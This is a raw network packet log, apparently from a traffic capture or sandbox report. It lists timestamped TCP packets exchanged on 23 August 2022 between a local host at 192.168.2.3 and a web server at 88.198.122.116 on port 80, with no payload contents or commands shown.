Aug 23, 2022 18:25:29.409348011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409370899 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409394979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409419060 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409442902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409466028 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409487963 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409513950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409538031 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409562111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409583092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409607887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409632921 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409655094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409676075 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409701109 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409724951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409748077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.409771919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.414290905 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419548988 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419604063 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419687033 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419734955 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419780970 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419820070 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419856071 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.419908047 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.420003891 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.420262098 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.420274019 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.420341015 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.420409918 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.421757936 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.421799898 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.421833992 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.421916962 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422082901 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422089100 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422229052 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422295094 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422561884 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422632933 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422715902 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.422827005 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.452882051 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.452920914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.452941895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.452961922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.452984095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.453003883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.453025103 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.453047037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.454685926 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.455940008 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.457905054 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.457941055 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458015919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458043098 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458065033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458090067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458115101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458148956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458169937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458190918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458215952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458235979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458257914 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458277941 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458297968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458318949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458340883 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458363056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458384991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458405972 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458427906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458450079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458470106 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458489895 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458511114 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458532095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458553076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458571911 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458591938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458616018 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458640099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458662987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458683968 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458705902 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458729029 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458754063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458777905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458800077 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458822966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458847046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458878040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458910942 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458945990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458976030 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.458997011 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459021091 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459028006 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459043026 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459095955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459120035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459145069 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459177971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459199905 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459224939 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459248066 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459271908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459275007 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459332943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459387064 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459410906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459433079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459455967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459481001 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459506035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459520102 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459532976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459537983 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459557056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459606886 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459656954 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459680080 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459703922 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459728956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459750891 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459753990 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459779978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459794998 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459806919 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459841013 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459847927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459873915 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459901094 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459906101 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.459928036 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459954977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.459981918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460007906 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460043907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460067034 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460092068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460117102 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460143089 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460165977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460191965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460216999 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460244894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460272074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460299015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460325956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460350037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460377932 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460406065 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.460431099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.461303949 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.461376905 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.461455107 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.461504936 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.461551905 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.461575985 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.492176056 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.492208004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.492232084 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.492253065 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.492257118 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.492280006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.492284060 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.492305040 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.492325068 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.492347002 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.493185997 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.493216991 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.493241072 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.493267059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.493453979 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.497859955 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.497912884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.497942924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.497975111 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498003960 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498034000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498063087 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498091936 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498123884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498153925 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498183966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498212099 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498240948 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498270988 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498300076 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498331070 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498358965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498383045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498406887 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498440027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498461962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498490095 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498514891 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498538971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498569012 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498596907 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498605967 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.498622894 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498646021 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.498650074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498676062 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498697042 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.498701096 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498724937 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498749971 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498776913 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498802900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498826027 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498852015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498873949 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498900890 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498925924 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498951912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.498977900 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499002934 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499027967 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499052048 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499098063 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499129057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499131918 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.499155045 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499178886 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.499181986 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499217033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499242067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499269962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499295950 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499321938 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499417067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499444962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499468088 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499492884 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499519110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499547005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499569893 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499594927 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499624014 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499651909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499676943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499702930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499730110 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499758005 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499784946 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.499809980 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.500138998 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.501319885 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.501341105 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.501346111 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.530272961 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.530333996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.530364037 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.530390978 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.530440092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.530467033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531461000 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531507015 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531532049 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531557083 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531582117 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531605959 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531634092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531661987 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531686068 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531709909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531735897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531759977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531785965 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531809092 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531829119 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531851053 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531869888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531888962 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531908035 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531929016 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531950951 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531971931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.531992912 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532016039 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532037020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532057047 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532077074 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532100916 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532124996 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532145977 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532166004 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532186985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532207966 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532232046 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.532255888 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.534632921 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.537420034 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.537853956 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.537885904 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.537909985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.537935019 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.537961006 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.537985086 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538007975 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538031101 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538055897 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538080931 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538106918 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538131952 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538156033 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538182020 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538204908 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538228989 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538254976 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538280010 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538305044 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538331985 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538366079 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538392067 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538415909 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538440943 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538466930 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538472891 CEST	49943	80	192.168.2.3	88.198.122.116
Aug 23, 2022 18:25:29.538490057 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538512945 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538537979 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538562059 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538587093 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538611889 CEST	80	49943	88.198.122.116	192.168.2.3
Aug 23, 2022 18:25:29.538635969 CEST	80	49943	88.198.122.116	192.168.2.3
